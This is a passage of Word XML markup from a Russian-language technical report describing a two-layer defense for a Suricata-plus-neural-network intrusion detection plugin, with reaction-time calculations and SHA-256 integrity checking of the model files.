          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> + ИНС): Поступающий трафик немедленно передается на анализ в модуль </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="00B93B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="00B93B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, расширенный нейронной </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00B93B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">сетью. Процесс анализа занимает </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="00B93B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T_об</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="00B93B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 4 секунды. Нейросеть выявляет аномалии, которые не могут быть обнаружены сигнатурными методами (например, новые типы ботнетов или скрытый трафик)</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A5A8CCA" w14:textId="4268B601" w:rsidR="008E0171" w:rsidRPr="00B93B26" w:rsidRDefault="00B93B26" w:rsidP="00B93B26">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:suppressAutoHyphen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w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="00B93B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>енерация сигнала и блокировка (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="00B93B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Suricata</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="00B93B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> + ИНС → Блокировка): после обнаружения угрозы система генерирует сигнал и активирует правило блокировки. Время на применение правила и блокировку потока составляет </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="00B93B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T_б</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="00B93B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 3 секунды</w:t>
      </w:r>
      <w:r w:rsidRPr="00B93B26">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ED82913" w14:textId="3188108D" w:rsidR="008E0171" w:rsidRPr="005336D7" w:rsidRDefault="00B93B26" w:rsidP="00B93B26">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="709"/>
        </w:tabs>
        <w:suppressAutoHyphen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8E0171" w:rsidRPr="005336D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>бщее время реакции</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="008E0171" w:rsidRPr="005336D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Общее время от начала атаки до ее блокировки составляет </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="005336D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T_об</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="005336D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="005336D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T_б</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="008E0171" w:rsidRPr="005336D7">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 7 секунд. Поскольку это время больше, чем продолжительность атаки (6 секунд), существует риск, что часть атаки успеет пройти. Однако расчет вероятности P2 показывает, что система успевает обнаружить и заблокировать 85.7% подобных атак</w:t>
      </w:r>
      <w:r w:rsidR="007C1383">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45ACBC4E" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="00B42160" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6BA63C85" w14:textId="77777777" w:rsidR="00181ECB" w:rsidRDefault="00181ECB" w:rsidP="00181EC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1.4.2</w:t>
      </w:r>
      <w:r w:rsidR="00CD546F">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00181ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Информационный рубеж включает контроль целостности файлов и системных компонентов, механизмы блокировки подозрительных объектов, политики минимальных привилегий и возможность активного реагирования. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CFB2EB0" w14:textId="1CA23334" w:rsidR="002F7745" w:rsidRDefault="002F7745" w:rsidP="002F7745">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F7745">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Информационный рубеж реализован в виде встроенных механизмов безопасности нейросетевого плагина. В отличие от технического рубежа, который защищает сеть от внешних атак, информационный рубеж обеспечивает защиту целостности и доступности самого инструмента мониторинга. Ключевой угрозой на данном рубеже является несанкционированная модификация файлов нейросетевой модели — такое воздействие может привести к искажению результатов классификации без видимых признаков компрометации системы. Для противодействия данной угрозе реализован механизм периодической проверки хеш-сумм файлов</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7745">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Помимо угрозы модификации модели, информационный рубеж противодействует несанкционированному доступу к функциям плагина — для этого реализована ролевая модель разграничения доступа и двухфакторная аутентификация.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F7745">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">На рисунке </w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7745">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> представлена диаграмма последовательности обнаружения угрозы на информа</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ционном</w:t>
      </w:r>
      <w:r w:rsidRPr="002F7745">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> рубеже.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="216C1F57" w14:textId="0E73C6E3" w:rsidR="008E0171" w:rsidRPr="009F6E53" w:rsidRDefault="00BE7195" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3D5AEE16" wp14:editId="5161F4AF">
            <wp:extent cx="6156325" cy="4337685"/>
            <wp:effectExtent l="19050" t="19050" r="15875" b="24765"/>
            <wp:docPr id="53041835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56325" cy="4337685"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:solidFill>
                        <a:schemeClr val="tx1"/>
                      </a:solidFill>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BFB192F" w14:textId="472197B6" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009F6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Рисунок </w:t>
      </w:r>
      <w:r w:rsidR="005D6C1B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> –</w:t>
      </w:r>
      <w:r w:rsidR="00181ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Д</w:t>
      </w:r>
      <w:r w:rsidRPr="009F6E53">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>иаграмма</w:t>
      </w:r>
      <w:r w:rsidR="00181ECB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> последовательности </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>информационного рубежа</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B01EBF9" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="009F6E53" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4700F59B" w14:textId="77777777" w:rsidR="00BE7195" w:rsidRPr="00BE7195" w:rsidRDefault="00BE7195" w:rsidP="00BE7195">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7195">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Данная диаграмма иллюстрирует процесс обнаружения и нейтрализации попытки модификации файлов нейросетевой модели на информационном рубеже. Этот рубеж защищает целостность самого плагина — его модели, конфигурации и данных — от несанкционированного изменения.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ADB2290" w14:textId="77777777" w:rsidR="00BE7195" w:rsidRPr="00BE7195" w:rsidRDefault="00BE7195" w:rsidP="00BE7195">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7195">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>На диаграмме отражены следующие этапы:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C9AD55" w14:textId="562574C3" w:rsidR="00BE7195" w:rsidRPr="00BE7195" w:rsidRDefault="00BE7195" w:rsidP="00BE7195">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7195">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>попытка модификации (Злоумышленник → Файлы модели): злоумышленник предпринимает попытку изменить файлы нейросетевой модели с целью искажения результатов классификации или вывода системы из строя;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0B4024" w14:textId="1BC14405" w:rsidR="00BE7195" w:rsidRPr="00BE7195" w:rsidRDefault="00BE7195" w:rsidP="00BE7195">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7195">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">периодическая проверка целостности (Модуль контроля → Файлы модели): модуль контроля целостности автоматически вычисляет хеш-суммы файлов модели по алгоритму SHA-256 и сравнивает их с эталонными значениями. Среднее время между проверками составляет </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE7195">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T_об</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE7195">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 300 секунд (5 минут);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39A869A3" w14:textId="38CA2C2D" w:rsidR="00BE7195" w:rsidRPr="00BE7195" w:rsidRDefault="00BE7195" w:rsidP="00BE7195">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7195">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>обнаружение расхождения</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00BE7195">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> при несовпадении текущей и эталонной хеш-суммы фиксируется факт модификации файла. Время на формирование предупреждения составляет </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE7195">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T_б</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE7195">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> = несколько секунд;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4552F09E" w14:textId="1E362505" w:rsidR="00BE7195" w:rsidRPr="00BE7195" w:rsidRDefault="00BE7195" w:rsidP="00BE7195">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7195">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">уведомление администратора (Журнал аудита → Администратор): событие фиксируется в журнале аудита и формируется предупреждение в интерфейсе системы. Общее время реакции составляет </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE7195">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T_об</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE7195">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BE7195">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T_б</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BE7195">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> ≈ 300 секунд.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="730B396F" w14:textId="538759E3" w:rsidR="00BE7195" w:rsidRDefault="00BE7195" w:rsidP="00BE7195">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BE7195">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Таким образом, информационный рубеж обеспечивает защиту целостности нейросетевой модели от несанкционированной модификации. Совместное применение обоих рубежей формирует эшелонированную систему защиты — технический рубеж перехватывает атаки на сетевом уровне в режиме реального времени, тогда как информационный рубеж обеспечивает защиту самого инструмента мониторинга. </w:t>
      </w:r>
      <w:r w:rsidR="002F7745" w:rsidRPr="002F7745">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>В таблице 12 представлено сравнение характеристик двух рубежей защиты.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B489F4" w14:textId="77777777" w:rsidR="002F7745" w:rsidRDefault="002F7745" w:rsidP="002F7745">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="119CF0BE" w14:textId="7A24FAC2" w:rsidR="002F7745" w:rsidRDefault="002F7745" w:rsidP="002F7745">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
